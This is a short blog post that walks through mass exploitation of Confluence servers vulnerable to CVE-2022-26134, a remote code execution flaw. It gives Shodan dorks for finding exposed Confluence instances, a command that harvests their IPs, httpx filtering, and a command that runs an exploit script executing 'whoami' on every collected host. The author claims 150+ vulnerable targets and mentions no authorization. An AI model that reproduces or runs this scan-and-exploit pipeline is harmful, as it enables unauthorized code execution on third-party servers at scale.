How I was able to find 150+ vulnerable applications to CVE-2022–26134 | A Zero-day RCE

Abhishek Morla
2 min readSep 24, 2022

Hey everyone, I'm abhishekmorla.

Let's not dive into the heart of this CVE you can prefer this medium blog for a detailed analysis of this zero-day: “CVE-2022–26134
The main concern about this blog is to share with you how can you automate and save time.

Here is the link: “CVE-2022–26134 with shodan

The first part of the repository will collect all the IPs depending on which dork you have provided in the -d argument. you can use these shodan dorks to find Atlassian confluence applications :

http.component:”atlassian confluence”

http.favicon.hash:-305179312"

http.title:”Log In — Confluence” 200

http.component:”atlassian confluence” http.title:”Log In — Confluence” 200

http.favicon.hash:-305179312 200

So, run the shodan scripts to grab all the IPs

python3 shodan_script.py -API xxxxxxx -L 10 -D “http.favicon.hash:-305179312 200” > log.txt

Now we will use httpx to get all the valid IPs

cat log.txt | httpx -o forexploits.txt

Finally, run the exploit script against all the valid collected IPs

python3 CVE-2022–26134.py forexploits.txt “whoami”

It will print the IP and command for vulnerable hosts.

Video — https://youtu.be/mNBCMUNUn_U

Thanks for reading!

LinkedIn : https://www.linkedin.com/in/abhishekmorla/

twitter : https://twitter.com/abhishekmorla

--

--

Abhishek Morla

Security Consultant | CSE Student | Synack Red Team & Yogosha Member | Detectify Crowdsource Member | Prohacker at HacktheBox | 40+ Hall of fame